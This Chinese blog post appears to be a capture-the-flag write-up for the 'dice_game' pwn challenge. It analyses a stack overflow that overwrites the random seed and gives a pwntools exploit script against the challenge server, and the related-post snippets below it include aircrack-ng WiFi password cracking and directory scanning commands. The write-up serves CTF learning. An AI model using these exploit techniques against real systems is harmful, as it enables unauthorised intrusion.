攻防世界-dice_game-Writeup

最新推荐文章于 2022-03-11 11:58:06 发布
最新推荐文章于 2022-03-11 11:58:06 发布
阅读量799 收藏
点赞数
文章标签: dice_game 攻防世界
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43921239/article/details/106109307
版权

dice_game

题目来源: XCTF 4th-QCTF-2018

考点:栈溢出、混合编程

基本情况

程序实现的是一个具有用户姓名输入的菜随机数程序。

保护措施
Arch:     amd64-64-little
RELRO:    Full RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      PIE enabled
栈溢出

一开始我在纠结是输入数字时使用的是短整型,可不可能是整型溢出,这样既能保持低位数字符合要求,又能控制 rip 跳转到后门。一时想不起来是那一条题和这条很相似的,就这样怀疑。

最后观察是这里存在栈溢出:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  char buf[55]; // [rsp+0h] [rbp-50h]
  char v5; // [rsp+37h] [rbp-19h]
  ssize_t v6; // [rsp+38h] [rbp-18h]
  unsigned int seed[2]; // [rsp+40h] [rbp-10h]
  unsigned int v8; // [rsp+4Ch] [rbp-4h]

  memset(buf, 0, 0x30uLL);
  *(_QWORD *)seed = time(0LL);                  // 随机种子
  printf("Welcome, let me know your name: ", a2);
  fflush(stdout);
  v6 = read(0, buf, 0x50uLL);//栈溢出
  if ( v6 <= 49 )                               // 字符长度小于等于49
    buf[v6 - 1] = 0;                            // 最后一个字符替换为\x00
  printf("Hi, %s. Let's play a game.\n", buf);
  fflush(stdout);
  srand(seed[0]);
…………
}

这是个小范围的栈溢出,可以覆盖随机数 seed 。做到这里发现和这条题目完全一样:[guess_num](# guess_num)。

思路

固定随机数之后,就是 python c 的联合编程,用 ctypes实现。

rand缺省种子参数时默认使用种子为:0

EXP
from pwn import *
from ctypes import *

context.log_level = 'debug'

p = remote("124.126.19.106",45292)
#p = process("./dice_game")
elf = ELF("./dice_game")
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

payload = 'skye'.ljust(0x40,'a') + p64(0)
p.recvuntil("name:")
p.sendline(payload)

for _ in range(50):
	p.recvuntil('Give me the point')
	p.sendline(str(libc.rand()%6+1))


p.interactive()
SkYe231_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界misc高手进阶篇教程(5)
锋刃科技的博客
05-28 3741
Mysql 在mysql文件中ib_logfile0有flag 恶臭的数据包 Wireshark是看的有些懵 我们用aircrack-ng查看信息 然后再破解WiFi密码 aircrack-ng cacosmia.cap -w /usr/share/wordlists/fasttrack.txt 打开Wireshark 编辑->首选项->Protocols->IEEE 802.11 发现有个数据包里有PK就是zip,变成原始数据保存下来 需要密码
攻防世界 - MISC - 10 - 如来十三掌
古月浪子的博客
10-03 5228
攻防世界 - MISC - 10 - 如来十三掌审题思路知识点所需工具解题flag反思与心得 审题 思路 审题很重要!审题很重要!审题很重要!做这道题就靠审题了 知识点 考查选手对各种加密方法的了解 所需工具 WPS、CTFCrackTools 解题 打开附件,发现一大堆莫名其妙的文字,结合题目,联想到佛曰加密 放到在线佛曰加解密网站上解密 老规矩,base64解密一下,发现不行,仔细读题锁...
buuoj Pwn writeup 236-240
yongbaoii的博客
08-31 436
236 qctf_2018_dice_game 逻辑也是比较的简单。 有个随机数,在栈上,有个栈溢出,答对五十次就可以了。 但是我们可以直接覆盖种子 种子也覆盖成0.这样我们就可以知道第一个数是多少了。 溢出一下就可以了。 exp #-*- coding:utf-8 -*- from pwn import* from ctypes import* context.log_level="debug" r=remote("node4.buuoj.cn","27598") lib = cdll.LoadLi
攻防世界-Misc萌新-5-1(xortool使用)-WDCTF-2017
Sea_Sand息禅
04-22 6076
拿到文件,照惯例winhex查看,未知类型文件,xortool尝试: 尝试出了key:GoodLuckToYou,对原文件进行异或,脚本如下: key = 'GoodLuckToYou' flag = '' with open('cipher') as f: con = f.read() for i in range(len(con)): flag +=...
攻防世界-Misc-hit-the-core(strings使用、密码规律观察)
Sea_Sand息禅
04-26 3660
strings查看字符串,好像还真得到一个有用的串: 这个串挺长的,{}的位置正确,凯撒、栅栏就别想了,能不能从串本身找到规律? 仔细观察,发现前面部分的大写字母拼起来正好是ALEXCTF,而且每个字母之间隔了4个字母,写个脚本提取一下: data = 'cvqAeqacLtqazEigwiXobxrCrtuiTzahfFreqc{bnjrKwgk83kgd43j85ePgb_e_r...
程序员面试刷题的书哪个好-dice_world:骰子世界
07-07
dice_world 2018.05.29 预想场景: 用户登录大厅,可以上传管理自身游戏角色信息,每个用户可以管理多个游戏角色。 大厅具有多个房间,房间由用户创建,用户可以创建多个房间,也可以加入多个房间。 房间包含一个...
epicodus-pig_dice_fork
06-01
猪骰子此应用程序旨在通过 Epicodus 代码学校满足作业的要求。 有关 Epicodus 的更多信息,请 。描述模拟猪骰子的网络游戏作业:星期四课业JavaScript 第 2 周作者弗兰克·约翰逊和保罗·小川Chris Sefkin 和 Drew ...
Roll-Dice-Game-
03-26
"Roll-Dice-Game-" 是一个基于Web的掷骰子游戏项目,主要使用CSS技术来实现界面设计。在这个游戏中,用户可以模拟掷骰子的过程,体验到类似真实骰子的随机性和趣味性。通过分析其包含的文件"Roll-Dice-Game--main",...
DICE-Certificate-Profiles-r01_pub.pdf
最新发布
07-21
**DICE 技术规范详解** DICE(Device Identity Composition Engine)是一种安全框架,由可信计算组(Trusted Computing Group, TCG)制定,旨在增强物联网(IoT)设备的安全性和可信赖性。DICE证书配置文件(DICE ...
roll-dice-game:该项目是创建简单的掷骰子游戏的一种做法。 您可以在本地计算机的浏览器中与该应用进行交互,并与两个播放器一起玩。 使用JavaScript构建
05-08
掷骰子游戏该项目是创建简单的掷骰子游戏的一种做法。 您可以在本地计算机的浏览器中与该应用进行交互,并与两个播放器一起玩。 使用JavaScript构建。游戏规则: 游戏中有2位玩家,每局比赛。 在每个回合中,玩家掷...
dice-game:一个简单的骰子游戏示例
04-08
骰子游戏 设置 通过单击右上角的“ Fork”按钮来分叉此存储库 使用git clone {url}将新存储git clone {url}到本地计算机 脚步 完成HTML文档中的步骤以构建骰子游戏的原型界面 调用getRandomDiceRoll()并将结果存储为名为diceRoll的变量 更新用户界面( document ),显示与卷数匹配的骰子面(svg图像) 使用diceRoll更新标签“您已滚动:#”(用滚动替换#) 将掷骰过程包装在名为rollTheDice()的函数中,从console调用它以进行测试 尖端 在开始之前,请考虑使用浏览器的开发人员工具手动创建解决方案原型首先将“元素”选项卡中的文档从卷3更改为卷4 接下来,考虑在JS中进行原型设计, diceRoll在获得随机数之前为diceRoll分配一个数字这将通过在分配随机值之前创建受控案例来提供帮助 在编写代码时,
攻防世界(MISC)高手进阶
doraemon12345的博客
11-29 258
Recover-Deleted-File 下载文件修改文件后缀名为zip,解压文件得到disk-image,在linux里打开执行命令extundelete disk-image --restore-all 恢复误删文件 然后提权运行里面的flag文件得到flag 提权chmod +x flag 运行打开 ./flag 得到flag:de6838252f95d3b9e803b28df33b4baa ...
攻防世界-Misc-get_the_key(数据包中的请求头)
Sea_Sand息禅
05-08 1452
又一个瞎题,少了个web环境。 数据包中我们进行分析,首先这里: 是个401,没权限访问,然后有一个可以访问的: 看见这里有个请求头Authorization: Basic c2VjY29uMjAxNDpZb3VyQmF0dGxlRmllbGQ= 访问这个网页把这个加到请求头就行了。 ...
攻防世界 PWN 高手进阶 dice_gamewrite up)
qq_44768749的博客
08-18 377
攻防世界 PWN 高手进阶 dice_gamedice_game0x01 查看保护机制0x02 反汇编main:sub_A20():sub_B28():0x03利用过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 dice_ga
攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子
半岛铁盒的博客
03-05 1392
说明 这其实是一种类型题,新手刚开始会碰到,题目大致过程是 有个srand()的随机函数.需要覆盖 seed种子 即srand(seed) 把 seed 覆盖为一个固定的数 , srand 就是伪随机函数了, 题目会有个猜数循 环,比如猜对了20次flag就有了,和这道题类似的题目还有新手区的guess_num 解题 点进去read中的 buf; EXp from pwn import * from ctypes import * p=remote('111.200.241.244','38
ACTF Dice Game Writeup
这里没人
05-04 825
ACTF也算是结束了,浙大的那帮人脑洞也是够大的 π__π 这题目也是坑得可以。。。像我这样的渣渣只能是挑所有题目中最简单的来了。这次的ctf好坑啊,竟然所有逆向破解题都是apk,我完全不会啊(>﹏<),只能弄到ppc了。Dice Game 题目直接把python的源码贴了出来。源码如下:#!/usr/bin/env python # coding: utf-8 """ Yet another
ctf初入门攻防世界
weixin_63231007的博客
03-11 5093
Web 1.查一下网页的源代码,快捷键是ctrl+U; 2.如果网页不能查看,可能是robots协议,(在解压后的dirsearch_master文件夹里打开命令行 python dirsearch.py -u http://111.198.29.45:59344/ -e * 目录扫描)加上后缀robots.txt;点开后发先新的Disallow: f1ag_1s_h3re.php ;写在后缀后,得到flag。 Crypto 1.Base64是一种基于64个可打印ASCII字符对任意字节数据
Gym - 101502 D. Dice Game 思维+dp
人生如戏
08-11 587
D. Dice Game time limit per test 1.0 s memory limit per test 256 MB input standard input output standard output A dice is a small cube, with each side having a different number of spots on it...
攻防世界--game
weixin_30876945的博客
08-17 1209
题目链接:https://adworld.xctf.org.cn/task/answer?type=reverse&number=4&grade=0&id=5074 1.准备 打开测试用例 首先分析程序 得到是win32程序 2.第一种方法 2.1 分析代码 使用IDA打开,找到main函数,F5得到C代码 得知主要是...
def dice_coef_fun(smooth=1): def dice_coef(y_true, y_pred): #求得每个sample的每个类的dice intersection = K.sum(y_true * y_pred, axis=(1,2,3)) union = K.sum(y_true, axis=(1,2,3)) + K.sum(y_pred, axis=(1,2,3)) sample_dices=(2. * intersection + smooth) / (union + smooth) #一维数组 为各个类别的dice #求得每个类的dice dices=K.mean(sample_dices,axis=0) return K.mean(dices) #所有类别dice求平均的dice return dice_coef def dice_coef_loss_fun(smooth=0): def dice_coef_loss(y_true,y_pred): return 1-1-dice_coef_fun(smooth=smooth)(y_true=y_true,y_pred=y_pred) return dice_coef_loss
07-13
这段代码定义了两个函数,`dice_coef_fun` 和 `dice_coef_loss_fun`,用于计算 Dice Coefficient 和 Dice Coefficient Loss。 首先是 `dice_coef_fun` 函数,它接受一个平滑因子 `smooth` 的默认值为 1。在函数内部...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值